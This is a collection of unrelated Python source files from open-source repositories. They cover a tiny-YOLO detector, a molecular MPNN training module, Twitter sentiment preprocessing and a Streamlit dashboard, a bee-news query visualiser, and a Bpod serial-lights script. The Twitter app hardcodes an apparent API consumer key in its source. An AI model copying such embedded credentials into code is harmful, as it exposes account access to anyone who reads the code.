('leaky4', nn.LeakyReLU(0.1, inplace=True)),
# 5 max 11
('pool5', nn.MaxPool2d(2, 2)),
# 6 conv 12-14
('conv6', nn.Conv2d(64, 128, 3, 1, 1, bias=False)),
('bn6', nn.BatchNorm2d(128)),
('leaky6', nn.LeakyReLU(0.1, inplace=True)),
# 7 max 15
('pool7', nn.MaxPool2d(2, 2)),
# 8 conv 16-18
('conv8', nn.Conv2d(128, 256, 3, 1, 1, bias=False)),
('bn8', nn.BatchNorm2d(256)),
('leaky8', nn.LeakyReLU(0.1, inplace=True)),
# 9 max 19
('pool9', nn.MaxPool2d(2, 2)),
# 10 conv 20-22
('conv10', nn.Conv2d(256, 512, 3, 1, 1, bias=False)),
('bn10', nn.BatchNorm2d(512)),
('leaky10', nn.LeakyReLU(0.1, inplace=True)),
# 11 max 23
('pool11', MaxPoolStride1()),
# 12 conv 24-26
('conv12', nn.Conv2d(512, 1024, 3, 1, 1, bias=False)),
('bn12', nn.BatchNorm2d(1024)),
('leaky12', nn.LeakyReLU(0.1, inplace=True)),
# 13 conv 27-29
('conv13', nn.Conv2d(1024, 256, 1, 1, 0, bias=False)),
('bn13', nn.BatchNorm2d(256)),
('leaky13', nn.LeakyReLU(0.1, inplace=True)),
# 14 conv 30-32
('conv14', nn.Conv2d(256, 512, 3, 1, 1, bias=False)),
('bn14', nn.BatchNorm2d(512)),
('leaky14', nn.LeakyReLU(0.1, inplace=True)),
# 15 conv 33
('conv15', nn.Conv2d(512, 255, kernel_size=1, stride=1, padding=0)),
# 16 yolo 34
('yolo16', YoloLayer([3, 4, 5], self.config)),
# 17 route 35
('route17', EmptyModule()),
# 18 conv 36-38
('conv18', nn.Conv2d(256, 128, kernel_size=1, stride=1, padding=0)),
('bn18', nn.BatchNorm2d(128)),
('leaky18', nn.LeakyReLU(0.1, inplace=True)),
# 19 upsample 39
('upsample', nn.Upsample(scale_factor=2)),
# 20 route 40
('route20', EmptyModule()),
# 21 conv 41-43
('conv21', nn.Conv2d(384, 256, 3, 1, 1, bias=False)),
('bn21', nn.BatchNorm2d(256)),
('leaky21', nn.LeakyReLU(0.1, inplace=True)),
# 22 conv 44
('conv22', nn.Conv2d(256, 255, kernel_size=1, stride=1, padding=0)),
# 23 yolo 45
('yolo23', YoloLayer([0, 1, 2], self.config)),
]))
"""
def Conv_BN_Leaky(self, in_channel, out_channel, kernel_size, padding, bias=False):
conv_bn_leaky = nn.Sequential(
nn.Conv2d(in_channel, out_channel, kernel_size, padding, bias),
nn.BatchNorm2d(out_channel),
nn.LeakyReLU(0.1, inplace=True)
)
return conv_bn_leaky
"""
def forward(self, x, targets =None):
self.losses = defaultdict(float)
out_boxes = []
output= []
for i in range(19):
x = self.cnn[i](x)
x1 = x
# x1:26*26*256
for i in range(19,30):
x= self.cnn[i](x)
x2 = x
# x2:13*13*256
for i in range(30,34):
x = self.cnn[i](x)
y1 = x
for i in range(36,40):
x2 = self.cnn[i](x2)
# x2:26*26*128
#20 route 40th
x = torch.cat((x2,x1), 1)
# x:26*26*384
for i in range(41,45):
x = self.cnn[i](x)
y2 = x
if self.config.is_train:
x, *losses = self.cnn[34](y1, targets)
for name, loss in zip(self.loss_names, losses):
self.losses[name] += loss
output.append(x)
x, *losses = self.cnn[45](y2, targets)
for name, loss in zip(self.loss_names, losses):
self.losses[name] += loss
output.append(x)
else:
            boxes = self.cnn[34](y1, targets)
out_boxes.append(boxes)
            boxes = self.cnn[45](y2, targets)
out_boxes.append(boxes)
self.losses["recall"] /= 3
self.losses["precision"] /= 3
return sum(output) if self.config.is_train else torch.cat(out_boxes,1)
def load_weights(self, weightfile):
# Open the weights file
fp = open(weightfile, "rb")
header = np.fromfile(fp, dtype=np.int32, count=5) # First five are header values
# Needed to write header when saving weights
self.header_info = header
self.seen = header[3]
buf = np.fromfile(fp, dtype=np.float32) # The rest are weights
fp.close()
start = 0
"""
for i in self.conv_bn[0:-2]:
start = load_conv_bn(buf, start, self.cnn[i], self.cnn[i+1])
print(i)
"""
start = load_conv_bn(buf, start, self.cnn[0], self.cnn[1])
start = load_conv_bn(buf, start, self.cnn[4], self.cnn[5])
start = load_conv_bn(buf, start, self.cnn[8], self.cnn[9])
start = load_conv_bn(buf, start, self.cnn[12], self.cnn[13])
start = load_conv_bn(buf, start, self.cnn[16], self.cnn[17])
start = load_conv_bn(buf, start, self.cnn[20], self.cnn[21])
start = load_conv_bn(buf, start, self.cnn[24], self.cnn[25])
start = load_conv_bn(buf, start, self.cnn[27], self.cnn[28])
start = load_conv_bn(buf, start, self.cnn[30], self.cnn[31])
start = load_conv(buf, start, self.cnn[33])
start = load_conv_bn(buf, start, self.cnn[36], self.cnn[37])
start = load_conv_bn(buf, start, self.cnn[41], self.cnn[42])
start = load_conv(buf, start, self.cnn[44])
def save_weights(self, outfile):
fp = open(outfile, 'wb')
self.header_info[3] = self.seen
self.header_info.tofile(fp)
for i in range(len(self.cnn)):
if i in self.conv_bn:
save_conv_bn(fp, self.cnn[i], self.cnn[i+1])
if i in self.conv:
save_conv(fp, self.cnn[i])
fp.close()
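# Hedged usage sketch (an assumption, not part of the original file): build the model
# from config.py, load the Darknet weights, and push one dummy 416x416 image through it.
if __name__ == '__main__':
    from config import get_config
    cfg, _ = get_config()
    cfg.is_train = False
    net = tiny_yolo(cfg)
    net.load_weights(cfg.weightfile)  # expects yolov3-tiny.weights on disk
    dummy = torch.randn(1, 3, 416, 416)
    boxes = net(dummy)  # eval path: concatenated output of both YOLO heads
    print(type(boxes))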
```
|
{
"source": "jenna-fromer/molpal",
"score": 2
}
|
#### File: mpnn/ptl/model.py
```python
import logging
from typing import Dict, List, Optional, Tuple
import pytorch_lightning as pl
import torch
from torch.optim import Adam
from torch.nn import functional as F
from molpal.models import mpnn
from molpal.models.chemprop.nn_utils import NoamLR
logging.getLogger("lightning").setLevel(logging.FATAL)
class LitMPNN(pl.LightningModule):
"""A message-passing neural network base class"""
def __init__(self, config: Optional[Dict] = None):
super().__init__()
config = config or {}
self.mpnn = config.get("model", mpnn.MoleculeModel())
self.uncertainty = config.get("uncertainty", "none")
self.dataset_type = config.get("dataset_type", "regression")
self.warmup_epochs = config.get("warmup_epochs", 2.0)
self.max_epochs = config.get("max_epochs", 50)
self.num_lrs = 1
self.init_lr = config.get("init_lr", 1e-4)
self.max_lr = config.get("max_lr", 1e-3)
self.final_lr = config.get("final_lr", 1e-4)
self.criterion = mpnn.utils.get_loss_func(self.dataset_type, self.uncertainty)
self.metric = {
"mse": lambda X, Y: F.mse_loss(X, Y, reduction="none"),
"rmse": lambda X, Y: torch.sqrt(F.mse_loss(X, Y, reduction="none")),
}.get(config.get("metric", "rmse"), "rmse")
def training_step(self, batch: Tuple, batch_idx) -> torch.Tensor:
componentss, targets = batch
preds = self.mpnn(componentss)
mask = torch.tensor([[bool(y) for y in ys] for ys in targets], device=self.device)
targets = torch.tensor([[y or 0 for y in ys] for ys in targets], device=self.device)
class_weights = torch.ones(targets.shape, device=self.device)
# if args.dataset_type == 'multiclass':
# targets = targets.long()
# loss = (torch.cat([
# loss_func(preds[:, target_index, :],
# targets[:, target_index]).unsqueeze(1)
# for target_index in range(preds.size(1))
# ], dim=1) * class_weights * mask
# )
if self.uncertainty == "mve":
pred_means = preds[:, 0::2]
pred_vars = preds[:, 1::2]
loss = self.criterion(pred_means, pred_vars, targets)
else:
loss = self.criterion(preds, targets) * class_weights * mask
loss = loss.sum() / mask.sum()
return loss
def training_epoch_end(self, outputs):
losses = [d["loss"] for d in outputs]
train_loss = torch.stack(losses, dim=0).mean()
self.log("train_loss", train_loss)
def validation_step(self, batch: Tuple, batch_idx) -> List[float]:
componentss, targets = batch
preds = self.mpnn(componentss)
if self.uncertainty == "mve":
preds = preds[:, 0::2]
targets = torch.tensor(targets, device=self.device)
return self.metric(preds, targets)
def validation_epoch_end(self, outputs):
val_loss = torch.cat(outputs).mean()
self.log("val_loss", val_loss)
def configure_optimizers(self) -> List:
opt = Adam([{"params": self.mpnn.parameters(), "lr": self.init_lr, "weight_decay": 0}])
sched = NoamLR(
optimizer=opt,
warmup_epochs=[self.warmup_epochs],
total_epochs=[self.trainer.max_epochs] * self.num_lrs,
steps_per_epoch=self.num_training_steps,
init_lr=[self.init_lr],
max_lr=[self.max_lr],
final_lr=[self.final_lr],
)
scheduler = {
"scheduler": sched,
"interval": "step" if isinstance(sched, NoamLR) else "batch",
}
return [opt], [scheduler]
@property
def num_training_steps(self) -> int:
"""Total training steps inferred from datamodule and devices."""
if self.trainer.max_steps:
return self.trainer.max_steps
limit_batches = self.trainer.limit_train_batches
batches = len(self.train_dataloader())
if isinstance(limit_batches, int):
batches = min(batches, limit_batches)
else:
batches = int(limit_batches * batches)
num_devices = max(1, self.trainer.num_gpus, self.trainer.num_processes)
if self.trainer.tpu_cores:
num_devices = max(num_devices, self.trainer.tpu_cores)
effective_accum = self.trainer.accumulate_grad_batches * num_devices
return (batches // effective_accum) * self.trainer.max_epochs
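# Hedged usage sketch (an assumption; the dataloaders must yield (componentss, targets)
# batches as produced elsewhere in molpal):
#
#     model = LitMPNN({"uncertainty": "mve", "max_epochs": 50, "metric": "rmse"})
#     trainer = pl.Trainer(max_epochs=50)
#     trainer.fit(model, train_dataloader, val_dataloader)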
```
|
{
"source": "jennafu/howistwitterfeeling",
"score": 3
}
|
#### File: howistwitterfeeling/src/02_feature_engineering_2.py
```python
import re
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# Retrieve urls from tweets using URLExtract
# from urlextract import URLExtract
# extractor = URLExtract()
#urls = []
# for i in range(len(train)):
#urls.append(extractor.find_urls(train['text'][i]))
# Read in data after URL extraction
train = pd.read_csv('data/feature_engineered_1_data_partial.csv')
# Remove '][' from the `urls` column
train['urls'] = train['urls'].str[1:-1]
# Split the urls by ','
train['urls'] = train['urls'].str.split(", ")
# Find number of urls in each tweet
url_counts = []
for url in train['urls']:
if url[0] == '':
url_counts.append(0)
else:
url_counts.append(len(url))
train['url_counts'] = url_counts
# Create a function called clean that removes retweet markers, hyperlinks, hashtag symbols and mentions
def clean(x):
x = re.sub(r"^RT[\s]+", "", x)
x = re.sub(r"https?:\/\/.*[\r\n]*", "", x)
x = re.sub('[^ ]+\.[^ ]+','',x)
x = re.sub(r"#","", x)
x = re.sub(r"@[A-Za-z0–9]+","", x)
return x
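# Illustrative example (not in the original script):
#   clean("RT @user I love #bees so much")  ->  " I love bees so much"
# Note that the URL pattern above also strips everything after a link on the same
# line because of the greedy '.*'.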
# Apply the clean function to text column
train['text'] = train['text'].apply(clean)
# Remove the url, user columns from dataset and remove hastag symbols from hashtag column
train.drop(['hashtags'],axis=1,inplace=True)
train.drop(['user'],axis=1,inplace=True)
train.drop(['users'],axis=1,inplace=True)
train.drop(['urls'],axis=1,inplace=True)
train.drop(['tweet_id'],axis=1,inplace=True)
train.to_csv(r'data/feature_engineered_2_data.csv', index = False)
```
#### File: howistwitterfeeling/src/03_preprocessing.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import re
import string
import nltk
from nltk.corpus import stopwords
from nltk.corpus import wordnet
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
nltk.download('stopwords')
nltk.download('wordnet')
nltk.download('averaged_perceptron_tagger')
train = pd.read_csv('data/feature_engineered_2_data.csv')
train['text']=train['text'].astype(str)
# Global Parameters
stop_words = set(stopwords.words('english'))
# Lemmatize with POS Tag
def get_wordnet_pos(word):
"""Map POS tag to first character lemmatize() accepts"""
tag = nltk.pos_tag([word])[0][1][0].upper()
tag_dict = {"J": wordnet.ADJ,
"N": wordnet.NOUN,
"V": wordnet.VERB,
"R": wordnet.ADV}
return tag_dict.get(tag, wordnet.NOUN)
# Create a function preprocess_tweet_text
def preprocess_tweet_text(tweet):
# Convert all characters to lower case
    tweet = tweet.lower()
# Remove punctuations
tweet = tweet.translate(str.maketrans('', '', string.punctuation))
# Remove stopwords
tweet_tokens = word_tokenize(tweet)
filtered_words = [w for w in tweet_tokens if not w in stop_words]
# Lemmatization
lemmatizer = WordNetLemmatizer()
lemmatized_output = ' '.join([lemmatizer.lemmatize(w,get_wordnet_pos(w)) for w in filtered_words])
return " ".join(filtered_words)
# Apply the preprocess_tweet_text to text column
train['text'] = train['text'].apply(preprocess_tweet_text)
# Save preprocessed dataset
train.to_csv(r'data/preprocess_data.csv', index = False)
```
#### File: src/streamlit/howistwitterfeeling.py
```python
import streamlit as st
import tweepy
# Import the relevant packages
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import nltk
nltk.download('stopwords')
from nltk.corpus import stopwords
from datetime import timedelta, date
import matplotlib.pyplot as plt
from matplotlib.dates import DateFormatter
import pickle
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from textblob import TextBlob
import emoji
import regex
import matplotlib.pyplot as pPlot
from wordcloud import WordCloud
from PIL import Image
image = Image.open('src/streamlit/image/morning-brew-V6CdmV277nY-unsplash.jpg')
st.image(image,use_column_width=True)
# st.title('How is Twitter Feeling About...')
st.title('#How is Twitter Feeling About...')
st.text('Welcome to the app! This app provides real-time insights into what Twitter users \n'
'are feeling about a certain topic or issue. Enter the topic you are interested in below:')
option = st.text_input("Which topic would you like to explore?", 'Coronavirus')
# define your keys
consumer_key = '2YCaHB1rnU7I7U8BuDJVqPGP2'
consumer_secret = '<KEY>'
access_token = '<KEY>'
access_token_secret = '<KEY>'
auth = tweepy.OAuthHandler(consumer_key,consumer_secret)
auth.set_access_token(access_token,access_token_secret)
api = tweepy.API(auth, wait_on_rate_limit=True)
# Derive the date of last 7 days
def daterange(start_date, end_date):
for n in range(int((end_date - start_date).days)):
yield start_date + timedelta(n)
start_date = (date.today() + timedelta(days=-6))
end_date = (date.today() + timedelta(days=1))
date_list = []
for single_date in daterange(start_date, end_date):
date_list.append(single_date)
with st.spinner('Scraping Twitter Data....'):
# Retrive topic-specific tweets
tweets_list_date = list()
tweets_list_text = list()
for date_ in date_list:
text_query = option
coordinates = '43.651070,-79.347015,50mi'
language = 'en'
result_type = 'recent'
since_date = date_
until_date = (date_ + timedelta(days=1))
max_tweets = 1000
# Creation of query method using parameters
tweets = tweepy.Cursor(api.search,q = text_query,geocode = coordinates,lang=language,
result_type = result_type,since = since_date,until = until_date,
count = 100).items(max_tweets)
# List comprehension pulling chosen tweet information from tweets iterable object
# # Add or remove tweet information you want in the below list comprehension
for tweet in tweets:
tweets_list_date.append(tweet.created_at)
tweets_list_text.append(tweet.text)
# List comprehension pulling chosen tweet information from tweets iterable object
# # Add or remove tweet information you want in the below list comprehension
tweets_list = [[tweet.created_at,tweet.text] for tweet in tweets]
# Creation of dataframe from tweets_list
tweets_df = pd.DataFrame({'date' : tweets_list_date,'text' : tweets_list_text},columns=['date','text'])
st.success(f'Scraped {tweets_df.shape[0]} tweets in the GTA region from Twitter.')
# Add an independent column date
date = tweets_df['date']
date = pd.to_datetime(date).dt.date
# Retrieve the hashtags and add the column to the dataset
hashtags = []
for tweet in tweets_df['text']:
hashtags.append([i for i in tweet.split() if i.startswith("#") ])
tweets_df['hashtags'] = hashtags
# Find number of hashtags in each tweet
hashtag_counts = []
for hashtag in hashtags:
hashtag_counts.append(len(hashtag))
tweets_df['hashtag_counts'] = hashtag_counts
# Remove excessive information from text Column
import re
# Creating a function called clean, that removes all hyperlink, hashtags and mentions
def clean(x):
x = re.sub(r"^RT[\s]+", "", x)
x = re.sub(r"https?:\/\/.*[\r\n]*", "", x)
#x = re.sub('[^ ]+\.[^ ]+','',x)
x = re.sub(r"#","", x)
x = re.sub(r"@[A-Za-z0–9]+","", x)
return x
# Apply the clean function to text column
tweets_df['text'] = tweets_df['text'].apply(clean)
# Load features from training dataset
transformer = TfidfTransformer()
loaded_features = pickle.load(open("src/streamlit/pickle/reduced_new_feature.pkl", "rb"))
# Vectorize the text column
X_text = tweets_df['text'].astype(str)
tfidfconverter = TfidfVectorizer(max_features=10000,
ngram_range=(1,2),
min_df=0.0001, max_df=0.5,
stop_words=stopwords.words('english'),
token_pattern=r'\b[^\d\W]+\b',
strip_accents = "ascii",
vocabulary = loaded_features)
# Convert the features in test set to train set
X_text = transformer.fit_transform(tfidfconverter.fit_transform(X_text))
X_sample = pd.DataFrame(columns=tfidfconverter.get_feature_names(),data=X_text.toarray())
# Load trained model
filename = 'src/streamlit/pickle/svc_new_model.sav'
sgd_model = pickle.load(open(filename, 'rb'))
# Prediction
y_sample = sgd_model.predict(X_sample)
y_prediction = pd.DataFrame(y_sample,columns = ["prediction"])
y_prediction = pd.concat([date,y_prediction],axis=1)
# Get tweet sentiments using TextBlob
textblob_y = list()
for text in tweets_df['text']:
testimonial = TextBlob(text)
textblob_y.append(testimonial.sentiment.polarity)
# Function to find index of neutral tweets
def get_index_positions(list_of_elems, element):
    ''' Returns the indexes of all occurrences of a given element in
    the list list_of_elems '''
index_pos_list = []
index_pos = 0
while True:
try:
# Search for item in list from indexPos to the end of list
index_pos = list_of_elems.index(element, index_pos)
# Add the index position in list
index_pos_list.append(index_pos)
index_pos += 1
except ValueError as e:
break
return index_pos_list
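# Illustrative example (not in the original script):
#   get_index_positions([0.2, 0.0, -0.1, 0.0], 0.0)  ->  [1, 3]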
# Label tweets with neutral sentiments with the value of 0.5
y_prediction['prediction'][get_index_positions(textblob_y,0.0)] = 0.5
# Find the average sentiments in the last 7 days
y_prediction_table = y_prediction.groupby('date').mean()
# Create figure and plot space
import plotly.graph_objects as go
st.text(' ')
st.text('The chart below shows the average sentiment score for each of the last 7 days, \n'
        'on a scale of 0 to 1. Each daily score is the mean of the tweet-level \n'
        'predictions (0 or 1) made on that day.')
fig = go.Figure(data=go.Scatter(x=y_prediction_table.index, y=y_prediction_table.prediction))
fig.update_layout(
title={
'text': "Changes in Twitter Sentiments over Last 7 Days",
'y':0.9,
'x':0.45,
'xanchor': 'center',
'yanchor': 'top'},
yaxis_title="😠 <== Average Sentiment Scores ==> 😄",
xaxis_title="Date")
st.plotly_chart(fig)
def split_count(text):
'''
Return the emojis found in the twitter texts associated with the topic
    Input: a single tweet text (applied row-wise to the text column)
    Output: A list of emojis found in the text
'''
emoji_list = []
data = regex.findall(r'\X', text)
for word in data:
if any(char in emoji.UNICODE_EMOJI for char in word):
emoji_list.append(word)
return emoji_list
# Return the emojis found in the twitter texts
emoji_rows = tweets_df['text'].apply(split_count)
# Return a flattened list of emojis from the topic
emoji_list = []
for sublist in emoji_rows:
for item in sublist:
emoji_list.append(item)
emoji_count = [[x,emoji_list.count(x)] for x in set(emoji_list)]
st.text(' ')
st.text('The chart below finds and ranks the top 10 most frequently appearing emojis \n'
        'in the tweets we have scraped from Twitter.')
# Convert the list into a dataframe
emoji_df = pd.DataFrame(emoji_count,columns=['Emoji','Count']).sort_values('Count',ascending=False)
trace1 = {
"type": "bar",
"x": emoji_df['Emoji'][0:11],
"y": emoji_df['Count'][0:11]
}
data = go.Data([trace1])
fig = go.Figure(data=data)
fig.update_layout(
title={
'text': "Top 10 Emojis Associated with Topic",
'y':0.9,
'x':0.5,
'xanchor': 'center',
'yanchor': 'top'},
yaxis_title="Emoji Count",
xaxis_title="Emoji")
st.plotly_chart(fig)
# Merge sentiment and text columns into dataframe
text_sent = pd.concat([y_prediction['prediction'],tweets_df['text']],axis=1)
st.text(' ')
st.text('The word cloud below represents the words or phrases from tweets \n'
        'associated with positive and negative sentiments, respectively.')
# Create the word cloud
bird = np.array(Image.open('src/streamlit/image/twitter_mask.png'))
fig, (ax2, ax3) = plt.subplots(1, 2, figsize=[30, 15])
wordcloud2 = WordCloud( background_color='white',mask=bird,colormap="Reds",
width=600,stopwords=option,
height=400).generate(" ".join(text_sent[text_sent['prediction']==0]['text']))
ax2.imshow(wordcloud2)
ax2.axis('off')
ax2.set_title('Negative Sentiment',fontsize=35)
wordcloud3 = WordCloud( background_color='white',mask=bird,colormap="Greens",
width=600,stopwords=option,
height=400).generate(" ".join(text_sent[text_sent['prediction']==1]['text']))
ax3.imshow(wordcloud3)
ax3.axis('off')
ax3.set_title('Positive Sentiment',fontsize=35)
plt.show()
st.pyplot()
```
|
{
"source": "jenna-jordan/beepocalypse_streamlit",
"score": 3
}
|
#### File: jenna-jordan/beepocalypse_streamlit/app.py
```python
import streamlit as st
import pandas as pd
import numpy as np
import plotly.express as px
st.set_page_config(page_title="Beepocalpyse", layout="wide")
df = pd.read_csv(
"Data/bln-queries_6pubs_26Feb.csv",
parse_dates=["publication_date"],
dtype={"publisher": "category"},
)
st.title("Beepocalypse: Visualizing Query Results")
publisher_options = [
"New York Times",
"Washington Post",
"Associated Press",
"Agence France Presse",
"Xinhua General News Service",
"Deutsche Presse-Agentur",
]
publisher_map = {
"New York Times": "NYT",
"Washington Post": "WP",
"Associated Press": "AP",
"Agence France Presse": "AFP",
"Xinhua General News Service": "XGNS",
"Deutsche Presse-Agentur": "DPA",
}
query_options = list(df["query"].unique())
query_text = {
"total": """
```
(content:*) AND source_name:BulkLexisNexis
```
""",
"insect_population": """
```
(content:
(insect OR pollinator OR bee OR honeybee OR moth)
AND ("insect population"~5 OR "pollinator population"~5 OR "bee population"~5 OR "honeybee population"~5 OR "moth population"~5 OR "biological diversity" OR biodiversity OR biomass OR ecolog* OR ecosystem* OR entomolog*)
AND (study OR professor OR experiment OR research OR analysis OR data)
)
AND (source_name:BulkLexisNexis)
```
""",
"insect_decline": """
```
(content:
(insect OR pollinator OR bee OR honeybee OR moth)
AND ("insect population"~5 OR "pollinator population"~5 OR "bee population"~5 OR "honeybee population"~5 OR "moth population"~5 OR "biological diversity" OR biodiversity OR biomass OR ecolog* OR ecosystem* OR entomolog*)
AND (study OR professor OR experiment OR research OR analysis OR data)
AND (crisis OR "colony collapse" OR apocalypse OR armageddon OR extinct OR "insect decline"~5 OR "insect drop"~5 OR "insect decrease"~5 OR "insect disappear"~5 OR "population decline"~5 OR "population drop"~5 OR "population decrease"~5 OR "population disappear"~5 OR "abundance decline"~5 OR "abundance drop"~5 OR "abundance decrease"~5 OR "abundance disappear"~5)
)
AND (source_name:BulkLexisNexis)
```
""",
"pollinator_population": """
```
(content:
((insect AND pollinator) OR (bee OR honeybee OR moth))
AND ("insect population"~5 OR "pollinator population"~5 OR "bee population"~5 OR "honeybee population"~5 OR "moth population"~5 OR "biological diversity" OR biodiversity OR biomass OR ecolog* OR ecosystem* OR entomolog*)
AND (study OR professor OR experiment OR research OR analysis OR data)
)
AND (source_name:BulkLexisNexis)
```
""",
"pollinator_decline": """
```
(content:
((insect AND pollinator) OR (bee OR honeybee OR moth))
AND ("insect population"~5 OR "pollinator population"~5 OR "bee population"~5 OR "honeybee population"~5 OR "moth population"~5 OR "biological diversity" OR biodiversity OR biomass OR ecolog* OR ecosystem* OR entomolog*)
AND (study OR professor OR experiment OR research OR analysis OR data)
AND (crisis OR "colony collapse" OR apocalypse OR armageddon OR extinct OR "insect decline"~5 OR "insect drop"~5 OR "insect decrease"~5 OR "insect disappear"~5 OR "population decline"~5 OR "population drop"~5 OR "population decrease"~5 OR "population disappear"~5 OR "abundance decline"~5 OR "abundance drop"~5 OR "abundance decrease"~5 OR "abundance disappear"~5)
)
AND (source_name:BulkLexisNexis)
```
""",
"insect_apocalypse": """
```
(content:"insect apocalypse"~5 OR "insect armageddon"~5 OR "beepocalypse")
AND (source_name:BulkLexisNexis)
```
""",
"colony_collapse": """
```
(content:"colony collapse" AND (bee OR honeybee))
AND (source_name:BulkLexisNexis)
```
""",
"climate_change": """
```
(content:"climate change" OR "global warming")
AND (source_name:BulkLexisNexis)
```
""",
"climate_change_IPCCreport": """
```
(content:
("climate change" OR "global warming")
AND ("IPCC" OR "Intergovernmental Panel on Climate Change")
AND report
)
AND (source_name:BulkLexisNexis)
```
""",
"insect_population_studies": """
```
(content:
("Krefeld" OR "the German study" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "the Puerto Rico study" OR "S?nchez-Bayo" OR "Wyckhuys" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>")
AND (insect OR pollinator OR bee OR honeybee OR moth)
AND ("insect population"~5 OR "pollinator population"~5 OR "bee population"~5 OR "honeybee population"~5 OR "moth population"~5 OR "biological diversity" OR biodiversity OR biomass OR ecolog* OR ecosystem* OR entomolog*)
AND (study OR professor OR experiment OR research OR analysis OR data)
)
AND (source_name:BulkLexisNexis)
```
""",
}
with st.sidebar:
st.header("Configure the plot")
# plot_button = st.button("Add Plot")
# clear_button = st.button("Clear Plots")
choose_CountOrProp = st.radio(
"Article", ["count", "proportion"], key="count_or_prop"
)
# if "count_or_prop" not in st.session_state:
# st.session_state.count_or_prop = "count"
choose_comparison = st.radio(
"Compare", ["Queries", "Publishers"], key="queries_or_publishers"
)
# if "queries_or_publishers" not in st.session_state:
# st.session_state.queries_or_publishers = "Queries"
if choose_comparison == "Queries":
choose_publisher = st.selectbox(
"Choose a publisher", publisher_options, key="publisher"
)
# if "publisher" not in st.session_state:
# st.session_state.publisher = "New York Times"
elif choose_comparison == "Publishers":
choose_query = st.selectbox("Choose a query", query_options, key="query")
# if "query" not in st.session_state:
# st.session_state.query = "insect_population"
st.header("Learn more")
st.markdown(
"Read the journal article: [No buzz for bees: Media coverage of pollinator decline](https://www.pnas.org/content/118/2/e2002552117)"
)
see_queries = st.checkbox("Show Queries?")
if see_queries:
see_which_queries = st.multiselect(
"Show query text for", query_options, default=query_options
)
@st.cache
def create_plot(which_query=choose_comparison, y_axis=choose_CountOrProp):
if which_query == "Queries":
color = "query"
query_value = publisher_map[choose_publisher]
query_column = "publisher"
elif which_query == "Publishers":
color = "publisher"
query_value = choose_query
query_column = "query"
query_text = f"{query_column}=='{query_value}'"
title_text = f"{query_column}: {query_value}"
fig = px.line(
df.query(query_text),
x="publication_date",
y=y_axis,
color=color,
title=title_text,
)
if which_query == "Queries":
for trace in fig["data"]:
if trace["name"] == "total":
trace["visible"] = "legendonly"
fig.update_layout(xaxis_rangeslider_visible=True)
return fig
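# Illustrative example of the filter built above (not in the original app): choosing
# "Compare: Publishers" with query "insect_decline" evaluates
# df.query("query=='insect_decline'"), so one line per publisher is drawn over time.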
plot = create_plot()
st.plotly_chart(plot, use_container_width=True)
if see_queries:
for q in see_which_queries:
st.subheader(q)
st.markdown(query_text[q])
```
|
{
"source": "jennan/crash_prediction",
"score": 3
}
|
#### File: src/crash_prediction/visualize.py
```python
from pathlib import Path
import defopt
import pandas as pd
import hvplot
import hvplot.pandas # noqa
import panel as pn
def plot_map(dset, varname, title, cmap="fire", **kwargs):
return dset.hvplot.points(
"X",
"Y",
c=varname,
title=title,
rasterize=True,
aggregator="mean",
cmap=cmap,
geo=True,
tiles="CartoLight",
frame_width=450,
frame_height=450,
groupby="fold",
**kwargs
)
def display_results(dset_file: Path, *preds_file: Path, show: bool = True):
"""Display accidents according to their severity and compare with predictions
:param dset_file: CAS dataset .csv file
:param preds_file: predictions .csv file for one method
:param show: open the server in a new browser tab on start
"""
dset = pd.read_csv(dset_file, usecols=["X", "Y", "injuryCrash", "fold"])
dset["injuryCrash"] = dset["injuryCrash"].astype(float)
if preds_file:
filename_widget = pn.widgets.Select(
name="Predictions file",
options=list(preds_file),
margin=(20, 20, 0, 20),
width=400,
)
@pn.depends(filename=filename_widget.param.value)
def plot_crash_n_results(filename):
dset["predictions"] = pd.read_csv(filename)
dset["error"] = dset["injuryCrash"] - dset["predictions"]
crash_map = plot_map(dset, "injuryCrash", "Ground truth", clim=(0, 1))
preds_map = plot_map(dset, "predictions", "Predictions", clim=(0, 1))
error_map = plot_map(dset, "error", "Errors", cmap="seismic", clim=(-1, 1))
hv_maps = pn.panel(crash_map + preds_map + error_map)
return pn.Column(hv_maps[1][0][0], hv_maps[0])
pane = pn.Column(filename_widget, plot_crash_n_results)
else:
pane = pn.panel(plot_map(dset, "injuryCrash", "Ground truth"))
pn.serve(pane, show=show)
def main():
defopt.run(display_results)
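# Hedged CLI sketch (an assumption; defopt maps display_results' signature to
# command-line arguments, and the module path and file names below are hypothetical):
#
#     python -m crash_prediction.visualize cas_dataset.csv preds_knn.csv preds_mlp.csv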
```
|
{
"source": "jennan/iblrig",
"score": 3
}
|
#### File: iblrig/scripts/bpod_lights.py
```python
import logging
import struct
import sys
import serial
import iblrig.params as params
log = logging.getLogger('iblrig')
def main(comport: str, command: int):
if not comport:
comport = params.get_board_comport()
ser = serial.Serial(port=comport, baudrate=115200, timeout=1)
ser.write(struct.pack('cB', b':', command))
ser.close()
log.debug(f"Sent <:{command}> to {comport}")
return
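# Illustrative example (the command semantics are an assumption about the Bpod
# firmware): main('COM3', 0) should turn the port lights off, while
# main('COM3', 255) should set them to full intensity.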
if __name__ == "__main__":
if len(sys.argv) == 2:
comport = params.get_board_comport()
command = sys.argv[1]
else:
comport = sys.argv[1]
command = sys.argv[2]
main(comport, int(command))
```
|
{
"source": "jennapederson/retail-demo-store",
"score": 3
}
|
#### File: src/products/convert_catalog_data.py
```python
import argparse
import csv
import oyaml as yaml
def format_product(product):
product['abv'] = float(product['abv'])
product['price'] = float(product['price'])
if product['ibu'] == 'N/A':
product.pop('ibu')
else:
product['ibu'] = int(product['ibu'])
product['image'] = product['id'] + ".jpg"
style_prefix = "-".join(product['style'].replace('-',' ').split()).lower()
product['id'] = f"{style_prefix}-{product['id']}"
return product
def create_category(id, product):
return {
'id': id,
'name': product['category'],
'image': product['image']
}
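# Illustrative example (hypothetical CSV row, not from the original data):
#   format_product({'id': '42', 'abv': '5.5', 'ibu': 'N/A', 'price': '9.99',
#                   'style': 'Pale Ale', 'category': 'Ales'})
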